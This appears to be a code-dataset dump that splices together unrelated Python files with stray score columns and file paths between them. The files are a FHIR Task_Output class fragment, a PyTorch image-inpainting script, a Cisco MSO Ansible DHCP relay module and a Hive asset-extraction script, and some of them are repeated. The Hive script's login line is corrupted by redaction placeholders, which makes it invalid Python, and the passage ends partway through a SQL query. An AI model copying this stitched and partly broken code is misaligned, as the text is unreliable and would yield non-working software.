valueString: The value of the Output parameter as a basic type.
valueUri: The value of the Output parameter as a basic type.
valueDate: The value of the Output parameter as a basic type.
valueDateTime: The value of the Output parameter as a basic type.
valueTime: The value of the Output parameter as a basic type.
valueCode: The value of the Output parameter as a basic type.
valueOid: The value of the Output parameter as a basic type.
valueUuid: The value of the Output parameter as a basic type.
valueId: The value of the Output parameter as a basic type.
valueUnsignedInt: The value of the Output parameter as a basic type.
valuePositiveInt: The value of the Output parameter as a basic type.
valueMarkdown: The value of the Output parameter as a basic type.
valueElement: The value of the Output parameter as a basic type.
valueExtension: The value of the Output parameter as a basic type.
valueBackboneElement: The value of the Output parameter as a basic
type.
valueNarrative: The value of the Output parameter as a basic type.
valueAnnotation: The value of the Output parameter as a basic type.
valueAttachment: The value of the Output parameter as a basic type.
valueIdentifier: The value of the Output parameter as a basic type.
valueCodeableConcept: The value of the Output parameter as a basic
type.
valueCoding: The value of the Output parameter as a basic type.
valueQuantity: The value of the Output parameter as a basic type.
valueDuration: The value of the Output parameter as a basic type.
valueSimpleQuantity: The value of the Output parameter as a basic
type.
valueDistance: The value of the Output parameter as a basic type.
valueCount: The value of the Output parameter as a basic type.
valueMoney: The value of the Output parameter as a basic type.
valueAge: The value of the Output parameter as a basic type.
valueRange: The value of the Output parameter as a basic type.
valuePeriod: The value of the Output parameter as a basic type.
valueRatio: The value of the Output parameter as a basic type.
valueReference: The value of the Output parameter as a basic type.
valueSampledData: The value of the Output parameter as a basic type.
valueSignature: The value of the Output parameter as a basic type.
valueHumanName: The value of the Output parameter as a basic type.
valueAddress: The value of the Output parameter as a basic type.
valueContactPoint: The value of the Output parameter as a basic type.
valueTiming: The value of the Output parameter as a basic type.
valueMeta: The value of the Output parameter as a basic type.
valueElementDefinition: The value of the Output parameter as a basic
type.
valueContactDetail: The value of the Output parameter as a basic type.
valueContributor: The value of the Output parameter as a basic type.
valueDosage: The value of the Output parameter as a basic type.
valueRelatedArtifact: The value of the Output parameter as a basic
type.
valueUsageContext: The value of the Output parameter as a basic type.
valueDataRequirement: The value of the Output parameter as a basic
type.
valueParameterDefinition: The value of the Output parameter as a basic
type.
valueTriggerDefinition: The value of the Output parameter as a basic
type.
"""
__name__ = 'Task_Output'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.valueBoolean = None
# type: bool
self.valueInteger = None
# type: int
self.valueDecimal = None
# type: int
self.valueBase64Binary = None
# type: str
self.valueInstant = None
# type: str
self.valueString = None
# type: str
self.valueUri = None
# type: str
self.valueDate = None
# type: str
self.valueDateTime = None
# type: str
self.valueTime = None
# type: str
self.valueCode = None
# type: str
self.valueOid = None
# type: str
self.valueUuid = None
# type: str
self.valueId = None
# type: str
self.valueUnsignedInt = None
# type: int
self.valuePositiveInt = None
# type: int
self.valueMarkdown = None
# type: str
self.valueElement = None
# reference to Element: id
self.valueExtension = None
# reference to Extension
self.valueBackboneElement = None
# reference to BackboneElement
self.valueNarrative = None
# reference to Narrative
self.valueAnnotation = None
# reference to Annotation
self.valueAttachment = None
# reference to Attachment
self.valueIdentifier = None
# reference to Identifier
self.valueCodeableConcept = None
# reference to CodeableConcept
self.valueCoding = None
# reference to Coding
self.valueQuantity = None
# reference to Quantity
self.valueDuration = None
# reference to Duration
self.valueSimpleQuantity = None
# reference to Quantity
self.valueDistance = None
# reference to Distance
self.valueCount = None
# reference to Count
self.valueMoney = None
# reference to Money
self.valueAge = None
# reference to Age
self.valueRange = None
# reference to Range
self.valuePeriod = None
# reference to Period
self.valueRatio = None
# reference to Ratio
self.valueReference = None
# reference to Reference: identifier
self.valueSampledData = None
# reference to SampledData
self.valueSignature = None
# reference to Signature
self.valueHumanName = None
# reference to HumanName
self.valueAddress = None
# reference to Address
self.valueContactPoint = None
# reference to ContactPoint
self.valueTiming = None
# reference to Timing
self.valueMeta = None
# reference to Meta
self.valueElementDefinition = None
# reference to ElementDefinition
self.valueContactDetail = None
# reference to ContactDetail
self.valueContributor = None
# reference to Contributor
self.valueDosage = None
# reference to Dosage
self.valueRelatedArtifact = None
# reference to RelatedArtifact
self.valueUsageContext = None
# reference to UsageContext
self.valueDataRequirement = None
# reference to DataRequirement
self.valueParameterDefinition = None
# reference to ParameterDefinition
self.valueTriggerDefinition = None
# reference to TriggerDefinition
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Signature',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSignature'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Output',
'child_variable': 'valueReference'},
{'parent_entity': 'BackboneElement',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueBackboneElement'},
{'parent_entity': 'RelatedArtifact',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRelatedArtifact'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSimpleQuantity'},
{'parent_entity': 'ContactPoint',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContactPoint'},
{'parent_entity': 'Extension',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueExtension'},
{'parent_entity': 'Age',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAge'},
{'parent_entity': 'Meta',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueMeta'},
{'parent_entity': 'Dosage',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDosage'},
{'parent_entity': 'TriggerDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueTriggerDefinition'},
{'parent_entity': 'Distance',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDistance'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCoding'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCodeableConcept'},
{'parent_entity': 'ElementDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueElementDefinition'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valuePeriod'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueIdentifier'},
{'parent_entity': 'DataRequirement',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDataRequirement'},
{'parent_entity': 'SampledData',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSampledData'},
{'parent_entity': 'Element',
'parent_variable': 'id',
'child_entity': 'Task_Output',
'child_variable': 'valueElement'},
{'parent_entity': 'HumanName',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueHumanName'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueMoney'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueQuantity'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContactDetail'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Count',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'type'},
{'parent_entity': 'Range',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRange'},
{'parent_entity': 'Timing',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueTiming'},
{'parent_entity': 'Duration',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDuration'},
{'parent_entity': 'Narrative',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueNarrative'},
{'parent_entity': 'ParameterDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueParameterDefinition'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAnnotation'},
{'parent_entity': 'Ratio',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRatio'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueUsageContext'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAddress'},
{'parent_entity': 'Contributor',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContributor'},
] | 0.770465 | 0.451266 |
import torch.nn.functional as F
import torch
import torchvision
from util.unnormalise import UnNormalize
import numpy as np
from PIL import Image
from util.params import Opion
import os
unnorm = UnNormalize(mean=[0.5] * 3, std=[0.5] * 3)
opt = Opion()
def img2photo(imgs):
return ((imgs+1)*127.5).transpose(1,2).transpose(2,3).detach().cpu().numpy().round()
input_image = Image.open(os.path.join(opt.dataroot,'001.jpg'))
def save_jpg(image, image_name, target_dir='pred'):
image = img2photo(image)
image = Image.fromarray(image[0].astype(np.uint8))
image.save(os.path.join(target_dir, "{}.jpg".format(image_name)),
format = 'JPEG', quality = 100, icc_profile = input_image.info.get('icc_profile',''))
def generate_images(model, dataloader, pred_dir='pred/'):
# model.eval()
# print("generating images")
for idx, (ori_image, ori_mask) in enumerate(dataloader):
align_corners=True
img_size=512 # Or any other size
# Shrinking the image to a square. # ori_imgs is the original image
image = F.interpolate(ori_image, img_size, mode='bicubic', align_corners=align_corners)
mask = F.interpolate(ori_mask, img_size, mode='bicubic', align_corners=align_corners)
image = image.clamp(min=-1, max=1)
image=image.cuda()
mask=mask.cuda()
mask=mask[0][0]
mask=torch.unsqueeze(mask,0)
mask=torch.unsqueeze(mask,1)
mask=mask.byte()
model.set_input(image,mask)
model.set_gt_latent()
model.test()
ori_image=ori_image.cuda()
ori_mask=ori_mask.cuda()
ori_height, ori_width = (ori_image.shape[2], ori_image.shape[3])
fake_B=model.get_current_visuals(fake=True)
fake_img=fake_B*mask + image*(1-mask)
# make image big again
new_img = F.interpolate(fake_img, (ori_height, ori_width), mode='bicubic', align_corners=align_corners)
new_img = new_img.clamp(min=-1,max=1)
# print(ori_image.shape, ori_mask.shape, new_img.shape)
new_img = ori_image*(1-ori_mask)+new_img*ori_mask #when new_img*ori_mask, information is lost.
new_img = unnorm(new_img)
save_jpg(new_img,image_name=401+idx) | final/csa/util/generate_images.py | import torch.nn.functional as F
import torch
import torchvision
from util.unnormalise import UnNormalize
import numpy as np
from PIL import Image
from util.params import Opion
import os
unnorm = UnNormalize(mean=[0.5] * 3, std=[0.5] * 3)
opt = Opion()
def img2photo(imgs):
return ((imgs+1)*127.5).transpose(1,2).transpose(2,3).detach().cpu().numpy().round()
input_image = Image.open(os.path.join(opt.dataroot,'001.jpg'))
def save_jpg(image, image_name, target_dir='pred'):
image = img2photo(image)
image = Image.fromarray(image[0].astype(np.uint8))
image.save(os.path.join(target_dir, "{}.jpg".format(image_name)),
format = 'JPEG', quality = 100, icc_profile = input_image.info.get('icc_profile',''))
def generate_images(model, dataloader, pred_dir='pred/'):
# model.eval()
# print("generating images")
for idx, (ori_image, ori_mask) in enumerate(dataloader):
align_corners=True
img_size=512 # Or any other size
# Shrinking the image to a square. # ori_imgs is the original image
image = F.interpolate(ori_image, img_size, mode='bicubic', align_corners=align_corners)
mask = F.interpolate(ori_mask, img_size, mode='bicubic', align_corners=align_corners)
image = image.clamp(min=-1, max=1)
image=image.cuda()
mask=mask.cuda()
mask=mask[0][0]
mask=torch.unsqueeze(mask,0)
mask=torch.unsqueeze(mask,1)
mask=mask.byte()
model.set_input(image,mask)
model.set_gt_latent()
model.test()
ori_image=ori_image.cuda()
ori_mask=ori_mask.cuda()
ori_height, ori_width = (ori_image.shape[2], ori_image.shape[3])
fake_B=model.get_current_visuals(fake=True)
fake_img=fake_B*mask + image*(1-mask)
# make image big again
new_img = F.interpolate(fake_img, (ori_height, ori_width), mode='bicubic', align_corners=align_corners)
new_img = new_img.clamp(min=-1,max=1)
# print(ori_image.shape, ori_mask.shape, new_img.shape)
new_img = ori_image*(1-ori_mask)+new_img*ori_mask #when new_img*ori_mask, information is lost.
new_img = unnorm(new_img)
save_jpg(new_img,image_name=401+idx) | 0.235548 | 0.257546 |
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: mso_dhcp_relay_policy_provider
short_description: Manage DHCP providers in a DHCP Relay policy.
description:
- Manage DHCP providers in a DHCP Relay policy on Cisco Multi-Site Orchestrator.
author:
- <NAME> (@jorgegome2307)
options:
dhcp_relay_policy:
description:
- Name of the DHCP Relay Policy
type: str
required: yes
aliases: [ name ]
ip:
description:
- IP address of the DHCP Server
type: str
tenant:
description:
- Tenant where the DHCP provider is located.
type: str
schema:
description:
- Schema where the DHCP provider is configured
type: str
template:
description:
- template where the DHCP provider is configured
type: str
application_profile:
description:
- Application Profile where the DHCP provider is configured
type: str
aliases: [ anp ]
endpoint_group:
description:
- EPG where the DHCP provider is configured
type: str
aliases: [ epg ]
external_endpoint_group:
description:
- External EPG where the DHCP provider is configured
type: str
aliases: [ ext_epg, external_epg ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: cisco.mso.modules
"""
EXAMPLES = r"""
- name: Add a new provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: present
delegate_to: localhost
- name: Remove a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: absent
delegate_to: localhost
- name: Query a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: query
delegate_to: localhost
- name: Query all provider of a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
state: query
delegate_to: localhost
"""
RETURN = r"""
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.mso.plugins.module_utils.mso import (
MSOModule,
mso_argument_spec,
)
def main():
argument_spec = mso_argument_spec()
argument_spec.update(
dhcp_relay_policy=dict(type="str", required=True, aliases=['name']),
ip=dict(type="str"),
tenant=dict(type="str"),
schema=dict(type="str"),
template=dict(type="str"),
application_profile=dict(type="str", aliases=['anp']),
endpoint_group=dict(type="str", aliases=['epg']),
external_endpoint_group=dict(type="str", aliases=['ext_epg', 'external_epg']),
state=dict(type="str", default="present", choices=["absent", "present", "query"]),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
["state", "present", ["ip", "tenant", "schema", "template"]],
["state", "absent", ["tenant", "schema", "template"]],
],
)
dhcp_relay_policy = module.params.get("dhcp_relay_policy")
ip = module.params.get("ip")
tenant = module.params.get("tenant")
schema = module.params.get("schema")
template = module.params.get("template")
if template is not None:
template = template.replace(' ', '')
application_profile = module.params.get("application_profile")
endpoint_group = module.params.get("endpoint_group")
external_endpoint_group = module.params.get("external_endpoint_group")
state = module.params.get("state")
mso = MSOModule(module)
path = "policies/dhcp/relay"
tenant_id = mso.lookup_tenant(tenant)
schema_id = mso.lookup_schema(schema)
provider = dict(
addr=ip,
externalEpgRef='',
epgRef='',
l3Ref='',
tenantId=tenant_id,
)
provider_index = None
previous_provider = {}
if application_profile is not None and endpoint_group is not None:
provider['epgRef'] = '/schemas/{schemaId}/templates/{templateName}/anps/{app}/epgs/{epg}'.format(
schemaId=schema_id, templateName=template, app=application_profile, epg=endpoint_group,
)
elif external_endpoint_group is not None:
provider['externalEpgRef'] = '/schemas/{schemaId}/templates/{templateName}/externalEpgs/{ext_epg}'.format(
schemaId=schema_id, templateName=template, ext_epg=external_endpoint_group
)
# Query for existing object(s)
dhcp_relay_obj = mso.get_obj(path, name=dhcp_relay_policy, key="DhcpRelayPolicies")
if 'id' not in dhcp_relay_obj:
mso.fail_json(msg="DHCP Relay Policy '{0}' is not a valid DHCP Relay Policy name.".format(dhcp_relay_policy))
policy_id = dhcp_relay_obj.get("id")
providers = []
if "provider" in dhcp_relay_obj:
providers = dhcp_relay_obj.get('provider')
for index, prov in enumerate(providers):
if (
(provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
):
previous_provider = prov
provider_index = index
# If we found an existing object, continue with it
path = '{0}/{1}'.format(path, policy_id)
if state == "query":
mso.existing = providers
if endpoint_group is not None or external_endpoint_group is not None:
mso.existing = previous_provider
mso.exit_json()
if endpoint_group is None and external_endpoint_group is None:
mso.fail_json(msg="Missing either endpoint_group or external_endpoint_group required attribute.")
mso.previous = previous_provider
if state == "absent":
provider = {}
if previous_provider:
if provider_index is not None:
providers.pop(provider_index)
elif state == "present":
if provider_index is not None:
providers[provider_index] = provider
else:
providers.append(provider)
if module.check_mode:
mso.existing = provider
else:
mso.existing = dhcp_relay_obj
dhcp_relay_obj["provider"] = providers
mso.sanitize(dhcp_relay_obj, collate=True)
new_dhcp_relay_obj = mso.request(path, method="PUT", data=mso.sent)
mso.existing = {}
for index, prov in enumerate(new_dhcp_relay_obj.get('provider')):
if (
(provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
):
mso.existing = prov
mso.exit_json()
if __name__ == "__main__":
main() | intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/mso/plugins/modules/mso_dhcp_relay_policy_provider.py |
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: mso_dhcp_relay_policy_provider
short_description: Manage DHCP providers in a DHCP Relay policy.
description:
- Manage DHCP providers in a DHCP Relay policy on Cisco Multi-Site Orchestrator.
author:
- <NAME> (@jorgegome2307)
options:
dhcp_relay_policy:
description:
- Name of the DHCP Relay Policy
type: str
required: yes
aliases: [ name ]
ip:
description:
- IP address of the DHCP Server
type: str
tenant:
description:
- Tenant where the DHCP provider is located.
type: str
schema:
description:
- Schema where the DHCP provider is configured
type: str
template:
description:
- template where the DHCP provider is configured
type: str
application_profile:
description:
- Application Profile where the DHCP provider is configured
type: str
aliases: [ anp ]
endpoint_group:
description:
- EPG where the DHCP provider is configured
type: str
aliases: [ epg ]
external_endpoint_group:
description:
- External EPG where the DHCP provider is configured
type: str
aliases: [ ext_epg, external_epg ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: cisco.mso.modules
"""
EXAMPLES = r"""
- name: Add a new provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: present
delegate_to: localhost
- name: Remove a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: absent
delegate_to: localhost
- name: Query a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: query
delegate_to: localhost
- name: Query all provider of a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
state: query
delegate_to: localhost
"""
RETURN = r"""
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.mso.plugins.module_utils.mso import (
MSOModule,
mso_argument_spec,
)
def main():
argument_spec = mso_argument_spec()
argument_spec.update(
dhcp_relay_policy=dict(type="str", required=True, aliases=['name']),
ip=dict(type="str"),
tenant=dict(type="str"),
schema=dict(type="str"),
template=dict(type="str"),
application_profile=dict(type="str", aliases=['anp']),
endpoint_group=dict(type="str", aliases=['epg']),
external_endpoint_group=dict(type="str", aliases=['ext_epg', 'external_epg']),
state=dict(type="str", default="present", choices=["absent", "present", "query"]),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
["state", "present", ["ip", "tenant", "schema", "template"]],
["state", "absent", ["tenant", "schema", "template"]],
],
)
dhcp_relay_policy = module.params.get("dhcp_relay_policy")
ip = module.params.get("ip")
tenant = module.params.get("tenant")
schema = module.params.get("schema")
template = module.params.get("template")
if template is not None:
template = template.replace(' ', '')
application_profile = module.params.get("application_profile")
endpoint_group = module.params.get("endpoint_group")
external_endpoint_group = module.params.get("external_endpoint_group")
state = module.params.get("state")
mso = MSOModule(module)
path = "policies/dhcp/relay"
tenant_id = mso.lookup_tenant(tenant)
schema_id = mso.lookup_schema(schema)
provider = dict(
addr=ip,
externalEpgRef='',
epgRef='',
l3Ref='',
tenantId=tenant_id,
)
provider_index = None
previous_provider = {}
if application_profile is not None and endpoint_group is not None:
provider['epgRef'] = '/schemas/{schemaId}/templates/{templateName}/anps/{app}/epgs/{epg}'.format(
schemaId=schema_id, templateName=template, app=application_profile, epg=endpoint_group,
)
elif external_endpoint_group is not None:
provider['externalEpgRef'] = '/schemas/{schemaId}/templates/{templateName}/externalEpgs/{ext_epg}'.format(
schemaId=schema_id, templateName=template, ext_epg=external_endpoint_group
)
# Query for existing object(s)
dhcp_relay_obj = mso.get_obj(path, name=dhcp_relay_policy, key="DhcpRelayPolicies")
if 'id' not in dhcp_relay_obj:
mso.fail_json(msg="DHCP Relay Policy '{0}' is not a valid DHCP Relay Policy name.".format(dhcp_relay_policy))
policy_id = dhcp_relay_obj.get("id")
providers = []
if "provider" in dhcp_relay_obj:
providers = dhcp_relay_obj.get('provider')
for index, prov in enumerate(providers):
if (
(provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
):
previous_provider = prov
provider_index = index
# If we found an existing object, continue with it
path = '{0}/{1}'.format(path, policy_id)
if state == "query":
mso.existing = providers
if endpoint_group is not None or external_endpoint_group is not None:
mso.existing = previous_provider
mso.exit_json()
if endpoint_group is None and external_endpoint_group is None:
mso.fail_json(msg="Missing either endpoint_group or external_endpoint_group required attribute.")
mso.previous = previous_provider
if state == "absent":
provider = {}
if previous_provider:
if provider_index is not None:
providers.pop(provider_index)
elif state == "present":
if provider_index is not None:
providers[provider_index] = provider
else:
providers.append(provider)
if module.check_mode:
mso.existing = provider
else:
mso.existing = dhcp_relay_obj
dhcp_relay_obj["provider"] = providers
mso.sanitize(dhcp_relay_obj, collate=True)
new_dhcp_relay_obj = mso.request(path, method="PUT", data=mso.sent)
mso.existing = {}
for index, prov in enumerate(new_dhcp_relay_obj.get('provider')):
if (
(provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
):
mso.existing = prov
mso.exit_json()
if __name__ == "__main__":
main() | 0.772874 | 0.236373 |
import logging
from kazoo.client import KazooClient
from full_incidents.hive_to_dwh.hive_connector import create_hive_connector
logger = logging.getLogger('hive_to_dwh')
def extract(hive_settings, zookeeper_settings, extraction_start_date):
zk = KazooClient(
hosts=zookeeper_settings)
zk.start(timeout=5)
for hiveserver2 in zk.get_children(path='hiveserver2'):
# string like serverUri=host:port;version=version;sequence=sequence
host_port = hiveserver2.split(';')[0].split('=')[1].split(':')
hive_settings["host"] = host_port[0]
hive_settings["port"] = host_port[1]
login = "{<EMAIL>}@{domain}".<EMAIL>(user=hive_settings['user'], domain=hive_settings['domain'])
command = "/usr/bin/kinit -k -t {keytab} {user}".format(keytab=hive_settings['keytab'], user=login)
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
process.communicate()
sys_date = {}
sys_date["sys_day"] = extraction_start_date.day
sys_date["sys_month"] = extraction_start_date.month
sys_date["sys_year"] = extraction_start_date.year
hive_connector = create_hive_connector(hive_settings)
cursor = hive_connector.create()
cursor.execute(
f"""
SELECT collector_location_fqdn as fqdn, collector_location_hostname as hostname,
collector_location_ip as ip, collector_organization as organization,
'' as title, true as is_collector, false as isnetworklocal,
false as is_source, false as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (collector_location_hostname is not NULL OR collector_location_ip is not NULL)
AND collector_organization is not NULL
UNION
SELECT eventsource_location_fqdn as fqdn, eventsource_location_hostname as hostname, eventsource_location_ip as ip,
sys_org as organization, eventsource_title as title,
false as is_collector, false as isnetworklocal, false as is_source, true as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (eventsource_location_hostname is not NULL OR eventsource_location_ip is not NULL) AND sys_org is not NULL
UNION
SELECT source_fqdn as fqdn, source_hostname as hostname, source_ip as ip, sys_org as organization,
'' as title, false as is_collector,
source_enrichment_isnetworklocal as isnetworklocal, true as is_source, false as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (source_hostname is not NULL OR source_ip is not NULL) AND sys_org is not NULL
UNION
SELECT destination_fqdn as fqdn, destination_hostname as hostname, destination_ip as ip, sys_org as organization,
'' as title, false as is_collector,
false as isnetworklocal, false as is_source, false as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (destination_hostname is not NULL OR destination_ip is not NULL) AND sys_org is not NULL
AND destination_enrichment_isnetworklocal=true
""",
parameters={'extraction_start_year': sys_date["sys_year"],
'extraction_start_month': sys_date["sys_month"],
'extraction_start_day': sys_date["sys_day"]}
)
raws = cursor.fetchall()
fields = [field[0].split('.')[1] for field in cursor.description]
assets = []
logging.info("Size of data extracted from the hive: %d", len(raws))
for raw in raws:
asset = dict(zip(fields, raw))
assets.append(asset)
cursor.close()
return assets, sys_date | full_incidents/hive_to_dwh/extract.py | import logging
from kazoo.client import KazooClient
from full_incidents.hive_to_dwh.hive_connector import create_hive_connector
logger = logging.getLogger('hive_to_dwh')
def extract(hive_settings, zookeeper_settings, extraction_start_date):
zk = KazooClient(
hosts=zookeeper_settings)
zk.start(timeout=5)
for hiveserver2 in zk.get_children(path='hiveserver2'):
# string like serverUri=host:port;version=version;sequence=sequence
host_port = hiveserver2.split(';')[0].split('=')[1].split(':')
hive_settings["host"] = host_port[0]
hive_settings["port"] = host_port[1]
login = "{<EMAIL>}@{domain}".<EMAIL>(user=hive_settings['user'], domain=hive_settings['domain'])
command = "/usr/bin/kinit -k -t {keytab} {user}".format(keytab=hive_settings['keytab'], user=login)
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
process.communicate()
sys_date = {}
sys_date["sys_day"] = extraction_start_date.day
sys_date["sys_month"] = extraction_start_date.month
sys_date["sys_year"] = extraction_start_date.year
hive_connector = create_hive_connector(hive_settings)
cursor = hive_connector.create()
cursor.execute(
f"""
SELECT collector_location_fqdn as fqdn, collector_location_hostname as hostname,
collector_location_ip as ip, collector_organization as organization,
'' as title, true as is_collector, false as isnetworklocal,
false as is_source, false as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (collector_location_hostname is not NULL OR collector_location_ip is not NULL)
AND collector_organization is not NULL
UNION
SELECT eventsource_location_fqdn as fqdn, eventsource_location_hostname as hostname, eventsource_location_ip as ip,
sys_org as organization, eventsource_title as title,
false as is_collector, false as isnetworklocal, false as is_source, true as is_eventsource
FROM {"normalized"}
